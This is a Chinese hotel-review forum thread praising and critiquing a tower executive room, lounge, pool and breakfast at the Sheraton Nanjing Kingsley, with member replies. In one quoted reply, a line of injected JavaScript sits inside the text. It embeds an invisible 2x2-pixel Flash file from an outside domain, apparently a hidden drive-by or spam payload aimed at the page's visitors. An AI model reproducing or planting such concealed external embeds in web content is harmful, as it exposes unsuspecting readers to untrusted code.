{var_dump()}
发文

南京金丝利喜来登塔楼行政房

2355 29
[htitle=一、,抵达酒店]第二次住,之前谈心升了塔楼行政房。
虽然论坛很多评价这家很捞,但是这次的体验还是很不错的。(后天升的新翻修的全景套,到时候再对比一下)
一进去就是熟悉的香味,直接去了39L塔楼酒廊CI。
大堂外观啥的偷了官网图,俺从来都记不得拍QAQ。
这家位置不用说的,一流,四通八达去哪儿都方便。 南京金丝利喜来登塔楼行政房
[/htitle][htitle=二、,客房]39L直接楼梯上一层就是了,不喜欢他们家电梯的设计,多此一举的感觉。
欢迎水果如图,饼干蛮好吃的(除了抹茶的)。
从套房退出来以后,住这家明显感觉小且拥挤。
一进房间窗帘自动拉开,映入眼帘的是南京全景,虽然咱们没有多漂亮的大楼,但是看着很舒服。 桌子是正对着落地窗放的。
40L的房间会比20几楼的小,印象中是少了个沙发吧。但是一些布置和小细节,几幅油画,超大电视机都让空间显得没那么拥挤。
有浴缸,还有泡泡浴~然后浴缸那儿有个小电视,我打不开不知道是坏了,还是咋滴。有个小细节我觉得很不错,关于浴缸的清洁、消毒步骤每天都有记录,直接到负责人,给我很干净很安全的感觉。
备品是欧舒丹,看了一下是进口国内分装的,味道闻着还不错。有点抠房间只有一套备品所以俺又要了一套。
Dolce Gusto的胶囊里和家里不是一个型号,还摸索了一下咋用。去酒廊要了冰牛奶一杯冰拿铁就制作完成了。
喝着拿铁,在小沙发上看着全景打游戏的感觉-----还是蛮爽的。
[/htitle][htitle=三、,设施与服务]泳池是浅深浅的设计,俺呛水了,sad。
之后……就没有心情写了
游完回来就开好了夜床,这次就一块巧克力。然后桌子里的耳塞用不上。
对了……床很舒服,枕头上有阵阵清香,喜欢!!浴袍也挺舒服。 南京金丝利喜来登塔楼行政房
[/htitle][htitle=四、,餐饮]酒廊虽然小但是人很少,很nice。
表扬一下,牛奶都是鲜奶,虽然是卫岗最便宜的那种,但比蒙牛纯牛奶好喝多了……
酒廊的咖啡就emmm,那种咖啡机打出来的都不好喝。
不过咖啡也好买,周边costa、星巴克、小众精品咖啡店都有。喜欢喝奶茶的姐妹也阔以去德基喜茶,大洋(记不清了)乐乐茶排队,人并不是很多。
早餐就那样吧,吃了两口没过多久肚子就开始不舒服了,我哭了 南京金丝利喜来登塔楼行政房
[/htitle]

一、 周边玩乐

玩乐太多了,然而我哪儿都不想去。
[htitle=六、,整体评价]整体感觉挺棒的,如果能升到塔楼房,值得一住。加税600多在南京的酒店来说有点不上不下,但喜来登是个好的选择。因为位置,也因为新翻修的房间的确还可以。
酒廊早可以单点,比3L体验好很多。楼下早真的人很多。
酒廊经理Amanda很专业人也nice。包括CO时送客的细节让人很舒服。泳池的高个子教练人也很好,可能是怕我去深水区一直在跟我聊天hhhhhhh。
不足的话,其实也很多。毕竟作为一个21年的老酒店,肯定有些硬件方面,没法和新的比。
比如外观,比如没有翻新的房间真的很emmm。
不知道年底要摘牌的消息真的假的,如果是真的还蛮可惜的,少了一个地段这么好选择。
在硬件相差不是特别大的基础上,我对酒店位置的要求>>硬件要求。
如果摘了,那以后来一个人住几天圣和真滴很贵了。 南京金丝利喜来登塔楼行政房
[/htitle]

评分 ( 1人) 威望 理由 总评分: 威望 +1  查看全部评分
大小飞飞
+ 1 恭喜, 每10个回复奖励1个威望, 每贴最高奖励10威望。
鲜花 (6朵) 鲜花榜
时光行者2019-7-4 22:57
送了1朵鲜花:  Life is better when shared!
美丽时光2019-7-4 22:52
送了1朵鲜花:  Life is better when shared!
Sasori2019-7-4 22:37
国安国安北京国安2019-6-24 16:26
NGBのMAX2019-6-22 15:46
上一篇:  下一篇: 

关注本版大神,阅读更多精彩好文

29 个评论

江宁凳子齐  钻石会员  2019-6-22 12:15:08  | 显示全部楼层
36楼路过
追极光的老鼠  钻石会员   楼主| 2019-6-22 12:25:52  | 显示全部楼层
江宁凳子齐 发表于 2019-6-22 12:15
36楼路过
你昨天在??
trillemma  禁止发言  2019-6-22 13:07:03  | 显示全部楼层
新装修的房间,洗手间的感应灯只能拔房卡才能关掉是不足
bluerossi    匿名飞客  发表于 1970-1-1 08:00:00

回帖奖励 +1 威望

post_deleted
追极光的老鼠  钻石会员   楼主| 2019-6-22 14:16:50  | 显示全部楼层
trillemma 发表于 2019-6-22 13:07
新装修的房间,洗手间的感应灯只能拔房卡才能关掉是不足
我没注意,好像可以关吧……
追极光的老鼠  钻石会员   楼主| 2019-6-22 14:26:19  | 显示全部楼层
x0818 发表于 2019-6-22 14:24
送黄瓜了
……没吃
txkj7400  金卡会员  2019-6-22 14:34:42  | 显示全部楼层
还不错哦
江宁凳子齐  钻石会员  2019-6-22 14:54:45  | 显示全部楼层
追极光的老鼠 发表于 2019-6-22 12:25
你昨天在??
现在
NGBのMAX  空乘  2019-6-22 15:46:34  | 显示全部楼层
还有一个礼拜就要去住啦,感谢楼主测评那么走心~
NoleundNicky  黑钻会员  2019-6-22 15:47:37  | 显示全部楼层
摘牌蛮好的,看着恶心
追极光的老鼠  钻石会员   楼主| 2019-6-22 19:33:00  | 显示全部楼层
txkj7400 发表于 2019-6-22 14:34
还不错哦$('swf_D9L').innerHTML=AC_FL_RunContent('width', '2', 'height', '2', 'allowNetworking', 'internal', 'allowAccess', 'never', 'src', 'https://v.ruher.info/images/ku/1.swf', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true');
追极光的老鼠  钻石会员   楼主| 2019-6-22 19:33:10  | 显示全部楼层
NBIBMAX 发表于 2019-6-22 15:46
还有一个礼拜就要去住啦,感谢楼主测评那么走心~
追极光的老鼠  钻石会员   楼主| 2019-6-22 21:28:40  | 显示全部楼层
tira26 发表于 2019-6-22 13:49
包邮区第一家震惊我的酒廊,贬义…
咋了……
thesea  终钻会员  2019-6-24 16:34:11  | 显示全部楼层

回帖奖励 +1 威望

黄瓜是认真的吗
AdamFei  蓝钻会员  2019-6-24 16:34:15  | 显示全部楼层

回帖奖励 +1 威望

亲两天住过 新装修的“全景套”除了雾化玻璃和折叠电视 其它。。。。。
DJ~~  黑钻会员  2019-6-24 16:38:27  | 显示全部楼层

回帖奖励 +1 威望

谢谢分享
追极光的老鼠  钻石会员   楼主| 2019-6-24 19:35:28  | 显示全部楼层
thesea 发表于 2019-6-24 16:34
黄瓜是认真的吗
今天住的套房也是黄瓜……